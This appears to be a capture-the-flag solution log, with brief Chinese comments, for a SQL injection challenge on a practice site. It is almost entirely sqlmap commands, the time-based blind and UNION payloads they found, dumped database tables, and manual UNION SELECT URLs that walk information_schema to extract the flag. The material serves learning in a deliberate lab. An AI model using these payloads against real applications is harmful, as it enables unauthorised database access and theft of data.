#找到sql注入点
sqlmap -p id -u 'https://hackme.inndy.tw/gb/?mod=read&id=2' 

[21:06:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mod=read&id=9 AND (SELECT 2096 FROM (SELECT(SLEEP(5)))JgHX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: mod=read&id=9 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626271,0x65516274464e65694a57465679454f5874725349625a716c4c4161455479534d7345594670414b57,0x7170707071),NULL-- -
---
[21:06:41] [INFO] the back-end DBMS is MySQL
===============================================================
#暴力列出当前数据库的所有数据
sqlmap -p id --current-db --all -u 'https://hackme.inndy.tw/gb/?mod=read&id=2' 
[21:19:34] [INFO] fetching entries for table 'flag' in database 'g8'
Database: g8
Table: flag
[3 entries]
+----+----------------------------------------------------+----------+----------+
| id | flag                                               | padding0 | padding1 |
+----+----------------------------------------------------+----------+----------+
| 1  | http://i.giphy.com/3o72FdPiRXBRbBLUc0.gif          | 1337     | 31415926 |
| 2  | FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#} | 77       | 88       |
| 3  | http://i.giphy.com/m7BTtLWhjkEJa.gif               | 6666     | 9999     |
+----+----------------------------------------------------+----------+----------+

===============================================================
#列出数据库的所有表
sqlmap -p id --tables -u 'https://hackme.inndy.tw/gb/?mod=read&id=2' 
Database: g8
[3 tables]
+---------------------------------------+
| flag                                  |
| posts                                 |
| users                                 |
+---------------------------------------+
#列出数据库特定表的所有字段
sqlmap -p id -D g8 -T flag --columns -u 'https://hackme.inndy.tw/gb/?mod=read&id=2' 
[21:32:03] [INFO] fetching columns for table 'flag' in database 'g8'
Database: g8
Table: flag
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| flag     | varchar(255) |
| id       | int(11)      |
| padding0 | int(11)      |
| padding1 | int(11)      |
+----------+--------------+
#列出数据库特定表的内容
sqlmap -p id -D g8 -T flag --dump -u 'https://hackme.inndy.tw/gb/?mod=read&id=2'
[21:35:48] [INFO] fetching entries for table 'flag' in database 'g8'
Database: g8
Table: flag
[3 entries]
+----+----------------------------------------------------+----------+----------+
| id | flag                                               | padding0 | padding1 |
+----+----------------------------------------------------+----------+----------+
| 1  | http://i.giphy.com/3o72FdPiRXBRbBLUc0.gif          | 1337     | 31415926 |
| 2  | FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#} | 77       | 88       |
| 3  | http://i.giphy.com/m7BTtLWhjkEJa.gif               | 6666     | 9999     |
+----+----------------------------------------------------+----------+----------+


#####################################
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,database(),4
g8
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='g8' limit 0,1),4
flag
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 0,1),4
id
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4
flag
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 2,1),4
padding0
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 3,1),4
padding1

https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select flag from g8.flag limit 0,1),4
http://i.giphy.com/3o72FdPiRXBRbBLUc0.gif
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select flag from g8.flag limit 1,1),4
FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#}
https://hackme.inndy.tw/gb/?mod=read&id=1 union select 1,2,(select flag from g8.flag limit 0,1),4
http://i.giphy.com/m7BTtLWhjkEJa.gif